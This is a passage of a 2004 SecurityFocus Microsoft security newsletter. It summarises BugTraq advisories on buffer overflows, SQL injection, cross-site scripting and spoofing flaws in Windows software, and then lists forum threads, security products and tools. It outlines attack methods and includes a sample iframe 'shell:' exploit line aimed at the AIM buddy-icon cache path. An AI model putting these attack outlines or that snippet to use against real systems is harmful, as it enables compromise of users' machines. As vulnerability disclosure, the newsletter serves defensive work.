procedures and is due to the use of a signed integer employed during
boundary checking routines.
An attacker may reportedly create a malicious bitmap that is crafted in a
manner to cause the affected integer to wrap to a negative value when the
malicious bitmap file is processed. When this integer is later used in a
procedure to read data into a 1024 byte buffer, the procedure may read
excessive data into the buffer invariably resulting in a stack buffer
overflow. Ultimately an attacker may exploit this condition to corrupt a
saved instruction or stack frame base pointer, to influence execution flow
of the affected browser into attacker-supplied instructions.
This vulnerability has been reported to affect Internet Explorer version
5, other versions may also be affected. Internet Explorer version 6 is
reported not vulnerable to this issue.
This issue could also be exposed via other software that uses Internet
Explorer to render images, such as Outlook, though this has not been
confirmed.
5. EarlyImpact ProductCart Multiple Vulnerabilities
BugTraq ID: 9669
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9669
Summary:
EarlyImpact ProductCart is e-commerce software that is implemented in ASP
and available for Microsoft Windows systems.
EarlyImpact ProductCart is reportedly prone to multiple vulnerabilities.
The specific issues include SQL injection, cross-site scripting and
cryptographic weaknesses. These issues could expose sensitive data such
as user credentials and allow for execution of hostile script code and
HTML. These issues could allow for full compromise of the software.
The following specific issues were reported:
A cryptographic weakness in the user credential encryption routines was
reported. In particular, the keystream used for the stream cipher is
prone to a chosen plaintext attack. Credentials are encrypted (and
decrypted) using a bitwise XOR operation with the keystream and the
plaintext or ciphertext (respective to whether the data is being encrypted
or decrypted). If the keystream can be determined, then it is trivial to
decrypt credentials for customers and administrators of the software. The
attacker would of course be required to have prior access to this data,
but this may be accomplished through exploitation of the SQL injection
vulnerability described below.
An SQL injection vulnerability has been reported in the advSearch_h.asp
script. Data supplied via URI parameters to this script will be used
directly in SQL queries without adequate input validation. This could
allow for various attacks, such as disclosing encrypted user credentials
(which could be decrypted via the previously mentioned cryptographic
weakness). Other attacks are also possible.
A cross-site scripting issue was reported in the Custva.asp script. Input
supplied to the 'redirectUrl' URI parameter will be included in
dynamically generated pages without adequate sanitization of HTML and
script code. An attacker could exploit this issue by embedding hostile
HTML and script code via this parameter in a malicious link. If
unsuspecting users following this link, the attacker-supplied code may be
rendered in the web browser in the security context of the site. This
could be exploited to steal cookie-based authentication credentials or to
mount other attacks.
6. RobotFTP Server Username Buffer Overflow Vulnerability
BugTraq ID: 9672
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9672
Summary:
RobotFTP Server is an FTP Server for Microsoft Windows operating systems.
A vulnerability has been reported for RobotFTP Server. The problem likely
occurs due to insufficient bounds checking when processing 'USER' command
arguments of excessive length.
By exploiting this issue to modify sensitive stack variables, an anonymous
remote attacker may be capable of exploiting this issue to execute
arbitrary code. This however has not been confirmed. Failed exploit
attempts may result in a denial of service.
7. Microsoft Outlook Express Arbitrary Program Execution Vulner...
BugTraq ID: 9673
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9673
Summary:
Microsoft Outlook Express uses Internet Explorer to render HTML e-mail and
newsgroup messages by default. A vulnerability may exist in the software
that may allow a remote attacker to execute arbitrary applications on a
vulnerable system. This issue may be exploited by embedding an object in
an HTML e-mail. It may be possible for an attacker to place a file in a
known folder through other means and have it executed through this method.
Due to a lack of information, further details are not available at the
moment. This BID will be updated as more information becomes available.
This issue may be related to the vulnerability described as Microsoft
Outlook and Outlook Express Arbitrary Program Execution Vulnerability (BID
6923).
8. YABB SE Quote Parameter SQL Injection Vulnerability
BugTraq ID: 9674
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9674
Summary:
YaBB SE is a freely available, open source port of Yet Another Bulletin
Board (YaBB). It is available for Unix, Linux, and Microsoft Operating
Systems.
A vulnerability in YaBB SE could make it possible for a remote user to
launch SQL injection attacks.
It has been reported that the issue exists due to insufficient sanitizing
of the 'quote' URI parameter, it is possible for a remote user to inject
arbitrary SQL queries into the database used by YaBB SE. This could permit
remote attackers to pass malicious input to database queries, resulting in
modification of query logic or other attacks.
Successful exploitation could result in compromise of the YaBB SE,
disclosure or modification of data or may permit an attacker to exploit
vulnerabilities in the underlying database implementation.
Proof of concept supplied within the reported allows an attacker to gain
access to users' password hash.
YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this
issue, however, other versions could be affected as well.
9. RhinoSoft Serv-U FTP Server SITE CHMOD Buffer Overflow Vulne...
BugTraq ID: 9675
Remote: Yes
Date Published: Feb 16 2004
Relevant URL: http://www.securityfocus.com/bid/9675
Summary:
RhinoSoft Serv-U FTP Server is designed for use with Microsoft Windows
operating systems.
RhinoSoft Serv-U FTP Server has been reported prone to a remote
post-authentication buffer overflow vulnerability.
The vulnerability is reported to exist when a malicious filename argument
is passed to the SITE CHMOD command. It has been reported that excessive
data passed to the SITE CHMOD command in this manner, will overrun the
bounds of a reserved buffer in memory. This will ultimately result in the
two least significant bytes of a saved pointer value being corrupted with
attacker-supplied values.
An attacker may potentially exploit this condition to control the location
of write into a somewhat limited range of memory. The immediate
consequences of this may be a denial of service. Although unconfirmed it
may be possible for an attacker to leverage this condition to have
arbitrary code executed in the context of the affected service.
This issue is not dependant on write permission on the affected FTP
server.
10. YaBB Information Leakage Weakness
BugTraq ID: 9677
Remote: Yes
Date Published: Feb 17 2004
Relevant URL: http://www.securityfocus.com/bid/9677
Summary:
YaBB (Yet Another Bulletin Board) is freely available web forum software
that is written in Perl. YaBB will run on most Unix/Linux variants, Mac
OS, and Microsoft Windows platforms.
YaBB is prone to a weakness that may permit remote users to enumerate
usernames. The cause of this issue is that YaBB returns different
responses based on whether or not a guessed username is valid or invalid
when the user attempts to log in. This information could aid in further
attacks.
It should be noted that this issue would only present a security risk on
installations that do not allow guests or anonymous web users to browse
the forum, in which case remote users would not be privy to usernames.
Otherwise this information would already be publicly accessible.
This issue was reported in YaBB 1 Gold - SP 1.3.1. Other versions may
also be affected.
11. Ipswitch IMail Server Remote LDAP Daemon Buffer Overflow Vul...
BugTraq ID: 9682
Remote: Yes
Date Published: Feb 17 2004
Relevant URL: http://www.securityfocus.com/bid/9682
Summary:
Ipswitch IMail is an e-mail server that serves clients their mail via a
web interface. It runs on Microsoft Windows operating systems. IMail ships
with an LDAP daemon.
The Ipswitch LDAP daemon has been reported prone to a remote buffer
overflow vulnerability. The vulnerability exists due to a lack of
sufficient boundary checks performed on user supplied LDAP tags. When
attacker-supplied data containing large LDAP tags is processed by the
affected service, a stack based buffer overflow condition will be
triggered. An attacker may exploit this condition to control variables
that are used as an offset from the active stack frame pointer, in a write
operation as follows:
mov byte ptr [ebp+ecx+var_4], dl
Because the location of the write is controlled, the remote attacker may
overwrite the Global Exception Handler to ultimately redirect the
execution flow of the affected service into attacker-supplied
instructions. The attacker's payload would be executed in the security
context of the affected service.
12. Microsoft Windows XP Help And Support Center Interface Spoof...
BugTraq ID: 9685
Remote: Yes
Date Published: Feb 17 2004
Relevant URL: http://www.securityfocus.com/bid/9685
Summary:
A weakness has been alleged in Microsoft Windows XP that could reportedly
allow aspects of the Help and Support Center interface to be spoofed via a
malicious link. By spoofing this interface, an attacker could potentially
present misleading or hostile content to a user in a manner which may
cause the user to trust it. This weakness employs the connection.htm
error page to present attacker-specified web pages in the interface with
various misleading properties, such as an arbitrary title (Windows Update
is used in the example) and instructional text.
Symantec has not been able to reproduce this alleged weakness.
13. WebCortex WebStores2000 Error.ASP Cross-Site Scripting Vulne...
BugTraq ID: 9693
Remote: Yes
Date Published: Feb 18 2004
Relevant URL: http://www.securityfocus.com/bid/9693
Summary:
WebCortex WebStores2000 is shopping cart software implemented in ASP. It
is available for Microsoft Windows operating environments.
It has been reported that WebStores2000 is prone to a cross-site scripting
vulnerability. This issue is reportedly due to a failure to sanitize user
input and so allow HTML and script code that may facilitate cross-site
scripting attacks.
This issue is reported to affect the 'Message_id' parameter of the
'error.asp' script.
This could permit a remote attacker to create a malicious link to the
vulnerable application that includes hostile HTML and script code. If this
link were followed, the hostile code may be rendered in the web browser of
the victim user. This would occur in the security context of the web
server and may allow for theft of cookie-based authentication credentials,
session data, or other attacks.
14. Microsoft Windows NtSystemDebugControl() Kernel API Function...
BugTraq ID: 9694
Remote: No
Date Published: Feb 18 2004
Relevant URL: http://www.securityfocus.com/bid/9694
Summary:
It has been reported that security exposures exist in kernel API functions
for Microsoft Windows operating systems that may permit local privilege
escalation attacks.
The primary source of these issues is that the ZwSystemDebugControl()
function exports the NtSystemDebugControl() Windows system function, which
is executed in kernel mode (ring 0). This could allow for numerous
attacks which could permit users to gain elevated privileges by executing
code in kernel context or reading from and writing to any kernel address.
These issues were reported to exist in Microsoft Windows XP but it has
been conjectured that Microsoft Windows Server 2003 may also be affected
by these issues.
It should be noted that a local user would require the SeDebugPrivilege to
exploit these flaws.
These flaws are currently pending further analysis. While only believed
to be one core vulnerability at this point (with multiple attack vectors),
it is still possible that distinct issues will be identified. In this
case, this BID will be separated into multiple BIDs accordingly.
15. Zone Labs ZoneAlarm SMTP Remote Buffer Overflow Vulnerabilit...
BugTraq ID: 9696
Remote: Yes
Date Published: Feb 19 2004
Relevant URL: http://www.securityfocus.com/bid/9696
Summary:
ZoneAlarm is a firewall software package designed for Microsoft Windows
operating systems. It is distributed and maintained by Zone Labs.
A vulnerability has been identified in the software that may allow an
attacker to execute arbitrary code on a vulnerable system in order to gain
unauthorized access. The problem exists due to insufficient boundary
checking by the TrueVector Internet Monitor (vsmon.exe) process used by
various Zone Labs applications.
It has been reported that Zone Labs products process incoming and outgoing
SMTP traffic to perform various security related functions. The issue is
reportedly caused by an unchecked buffer in the Simple Mail Transfer
Protocol (SMTP) processing, therefore it presents itself remotely when the
target system is operating as an SMTP server on TCP port 25.
Specifically, the issue arises when an outgoing e-mail message is examined
and the destination e-mail address is retrieved. This vulnerability can
be exploited remotely, if an attacker is able to send an outgoing e-mail
message via the server. The attacker would send a message with an
excessively large string value in the destination e-mail address field.
By sending a large value via the destination e-mail address field to the
'RCPT TO' command argument, a stack based buffer may overflowed in the
vsmon.exe process.
The issue may also be exploited locally to gain SYSTEM level privileges if
a malicious user on the system has been given permission to access the
network by an administrator or another user. An attacker may send a
malicious e-mail sufficient to trigger and exploit this issue. Immediate
consequences of an attack may result in a denial of service condition.
Successful exploitation of this issue may allow an attacker to cause the
firewall process to crash and/or execute arbitrary code in order to gain
SYSTEM level access.
ZoneAlarm family of products and Integrity client versions 4.0 and above
are reported to be prone to this issue. Integrity Server and Integrity
Clientless Security products are not affected by this issue.
16. AOL Instant Messenger Buddy Icon Predictable File Location W...
BugTraq ID: 9698
Remote: Yes
Date Published: Feb 19 2004
Relevant URL: http://www.securityfocus.com/bid/9698
Summary:
AOL Instant Messenger stores imported Buddy Icons in a predictable
location on client systems. Specifically, the files will be stored in the
following location on the local filesystem:
c:\documents and settings\username\application data\aim\bartcache\1
Other attacks are possible given the ability to store content on a system
in a predictable location, such as Microsoft Internet Explorer Shell:
IFrame Cross-Zone Scripting Vulnerability (BID 9628). The issue describe
in BID 9628 may allow hostile script code to access properties of an
IFrame that has been opened in the context of the My Computer Zone.
Reportedly, if an IFrame opens up a local resource using a 'shell:' link,
it may be possible for the page that spawns the IFrame to access
properties of the My Computer Zone.
The issue could be exploited via a malicious web page created by the
attacker. The attacker would then create another page that includes code
such as:
<iframe src="shell:appdata\aim\bartcache\1\maliciousfile"></iframe>
By creating a hyperlink to the malicious page and sending it to a victim
in a buddy list running AOL Instant Messenger client, this issue could
potentially allow for remote compromise of the client system in the
context of the client user. Successful exploitation would require that
the victim exists on your buddy list.
This issue has been tested on AOL Instant Messenger versions 4.3 to 5.5,
however, it is possible that other versions are affected as well.
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Controlling Admin Access (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/354798
2. Preventing OS Detection (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/354797
3. SecurityFocus Microsoft Newsletter #176 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/354204
4. PPTP versus L2TP and possible attacks (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/354022
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Norton Internet Security 2004
By: Symantec
Platforms: Windows 95/98
Relevant URL: http://www.symantec.com/sabu/nis/nis_pe/
Summary:
Symantec's Norton Internet Security 2004 provides essential protection
from viruses, hackers, and privacy threats. Powerful yet easy to use, this
award-winning suite now includes advanced spam-fighting software to filter
unwanted mail out of your inbox. Protect yourself, your family, and your
PC online with Norton Internet Security 2004.
2. Dekart Logon
By:
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.dekart.com/products/authentication_access/logon/
Summary:
Dekart Logon is a solution designed to provide an additional level of
security for the Microsoft Windows operating system. Access to the Windows
environment can only be gained after inserting a USB key or smart card
into the appropriate slot and by entering the correct PIN code.
Dekart Logon offers a number of security options: you can select to have
Windows access blocked once the key is removed, during a screen saver
timeout or other user assigned prompts. This flexibility automatically
reduces the possibility of human error by maintaining predefined security
levels even if the user leaves their PC unattended.
3. AppSentry
By: Integrigy
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.integrigy.com/appsentry.htm
Summary:
AppSentry is a new generation of security scanner and vulnerability
assessment tool. Unlike other security scanners, AppSentry knows the
application it is validating ? its technology and data model. The security
audits and checks are written specifically for the application being
tested. Hackers and mischievous employees often exploit security issues at
different layers of the technology stack, thus only a complete and
comprehensive security validation will uncover all risks in a multi-tiered
environment.
The advantage of AppSentry is now you don't have to seperate tools for the
operating system, web server, and database. AppSentry is a single tool
that can validate and audit the security of the entire application
technology stack from operating system to application layer.
AppSentry is available for the following applications -
Oracle E-Business Suite (11i)
Oracle Database (8.x, 8i, 9i, 10g)
Oracle Application Server (9iAS, 10g)
SAP
PeopleSoft
Microsoft SQL Server
4. AppDefend
By: Integrigy
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.integrigy.com/appdefend.htm
Summary:
AppDefend is a new concept in Intrusion Prevention - direct application
protection. AppDefend protects the application from attacks and intrusions
by blocking attacks before they reach the application.
AppDefend is designed specifically for the application it is protecting.
Thus, when implementing for the Oracle E-Business Suite, there is no
analysis or other configuration required to provide maximum protection for
the application. Integrigy has already performed all this work for you --
all modules, all versions.
AppDefend is designed to be simple to install and easy to maintain. A
straight-forward, yet robust, implementation takes only 15 minutes. No
complex configuration or analysis of the application is required.
5. Airscanner Mobile AntiVirus Pro
By: Airscanner Corp.
Platforms: Windows CE
Relevant URL: http://airscanner.com/downloads/av/av.html
Summary:
Airscanner Mobile AntiVirus Pro will quarantine or eradicate embedded
viruses and malware, has fast, optimized scanning speed based on patent
pending technology, has automatic, online updates of virus signatures and
scanning engine as well as support for PocketPC 2003/Windows Mobile 2003
and easy online updates.
In addition to an accurate virus scanner, Airscanner Mobile AntiVirus
includes these powerful tools for debugging Trojan horses:
- Intercept memory resident viruses with an advanced process discovery
tool.
- Debug Trojan hacks with an easy-to-use registry viewer.
- Uncover denial of service attacks with a rapid system analyzer.
- Enter your own custom virus signatures (for experts).
- Perform fast, recursive, and flexibly multithreaded filesystem
scanning.
6. Symantec?s Norton Internet Security 2004 Professional
By: Symantec
Platforms: Windows 2000, Windows 95/98, Windows XP
Relevant URL: http://www.symantec.com/smallbiz/nis_pr/
Summary:
Symantec?s Norton Internet Security 2004 Professional protects you and
your business from online threats. It eliminates viruses automatically,
blocks hackers, safeguards your personal information, fights spam,
increases online productivity, recovers lost or damaged files, and
thoroughly deletes confidential data you no longer need. Available in 5
and 10-user Small Office Packs.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
------------------------------------
1. GeneSyS v1.0
By: Balazs E. Pataki
Relevant URL: http://genesys.sztaki.hu
Platforms: UNIX, Windows 2000, Windows NT
Summary:
GeneSyS aims to define and implement a middleware architecture for generic
system monitoring and supervision. It is an Information Society Project
(IST-2001-34162) sponsored by the European Commission. It provides a
middleware- and agent-based approach for system monitoring and management.
It uses WebServices technology (SOAP) for communication between components
and XML-based descriptions of monitoring information.
2. aNTG v2.1
By: Lucas
Relevant URL: http://www.thebobo.com/antg.php
Platforms: UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
aNTG (another Network Traffic Grapher) is a PHP program that collects and
graphs network traffic statistics on a Linux machine.
3. Stunnel v4.05
By: Michal Trojnara, <Michal.Trojnara (at) mirt (dot) net [email concealed]>
Relevant URL: http://stunnel.mirt.net/
Platforms: FreeBSD, Linux, Windows 2000, Windows 95/98, Windows NT
Summary:
The stunnel program is designed to work as an SSL encryption wrapper
between remote client and local (inetd-startable) or remote server. It can
be used to add SSL functionality to commonly used inetd daemons like POP2,
POP3, and IMAP servers without any changes in the programs' code. It will
negotiate an SSL connection using the OpenSSL or SSLeay libraries. It
calls the underlying crypto libraries, so stunnel supports whatever
cryptographic algorithms you compiled into your crypto package.
4. Airscanner Mobile AntiVirus Pro v2.5
By: Airscanner Corp
Relevant URL: http://airscanner.com/downloads/av/av.html
Platforms: Windows CE
Summary:
Airscanner Corporation is the most trusted name in helping to defend your
mobile device from "airborne" computer viruses. From the company that
wrote the best-selling technical book Maximum Wireless Security comes a
professional strength virus scanner for the Pocket PC.
With the increased wireless connectivity of PDAs and Smartphones comes an
increased threat from virus attacks. Save money, time, and data by
protecting your valuable Pocket PC now with Airscanner Mobile AntiVirus
Pro.
5. FileWatch v1.0
By: robinkeir (at) foundstone (dot) com [email concealed]
Relevant URL: www.foundstone.com/rdlabs/tools.html
Platforms: Windows NT
Summary:
A file change monitor. Used with BlackICE Defender. FileWatch (originally
called ICEWatch 1.x) is a small utility that can monitor a given file for
changes. Monitoring can detect file size changes or simply file writes,
both with minimal impact on system resources (no polling is performed).
The primary use of this utility is for monitoring changes in the log file
of a personal firewall program and being able to spawn a separate
application when changes are detected, but the tool can be applied to any
number of other uses.
6. Enigmail v0.83.2
By: Patrick
Relevant URL: http://enigmail.mozdev.org/thunderbird.html
Platforms: Linux, MacOS, POSIX, UNIX, Windows 2000, Windows 3.x, Windows
95/98, Windows CE, Windows NT, Windows XP
Summary:
Enigmail is a "plugin" for the mail client of Mozilla and Netscape 7.x
which allows users to access the authentication and encryption features
provided by the popular GnuPG software. Enigmail can encrypt/sign mail
when sending, and can decrypt/authenticate received mail. It can also
import/export public keys. Enigmail supports both the inline PGP format
and the PGP/MIME format, which can be used to encrypt attachments.
Enigmail is cross-platform, although binaries are supplied only for a
limited number of platforms. Enigmail uses inter-process communication to
execute GPG to carry out encryption/authentication.
VI. UNSUBSCRIBE INSTRUCTIONS
----------------------------
To unsubscribe send an e-mail message to
ms-secnews-unsubscribe (at) securityfocus (dot) com [email concealed] from the subscribed address. The
contents of the subject or message body do not matter. You will receive a
confirmation request message to which you will have to answer.
Alternatively you can also visit http://www.securityfocus.com/newsletters
and unsubscribe via the website.
If your email address has changed email listadmin (at) securityfocus (dot) com [email concealed] and
ask to be manually removed.
------------------------------------------------------------------------
---
------------------------------------------------------------------------
---
[ reply ]